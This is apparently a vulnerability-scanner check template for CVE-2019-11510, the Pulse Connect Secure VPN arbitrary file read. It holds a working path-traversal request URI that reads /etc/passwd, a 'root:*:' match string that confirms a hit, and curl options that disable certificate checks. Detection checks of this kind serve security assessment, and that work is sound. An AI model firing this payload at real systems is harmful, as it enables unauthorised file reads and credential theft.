AUTHOR='@xer0dayz' VULN_NAME='CVE-2019-11510 - Pulse Connect Secure SSL VPN Arbitrary File Read' URI='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/' METHOD='GET' MATCH="root:*:" SEVERITY='P1 - CRITICAL' CURL_OPTS="--user-agent '' -s -L --insecure" SECONDARY_COMMANDS='' GREP_OPTIONS='-i'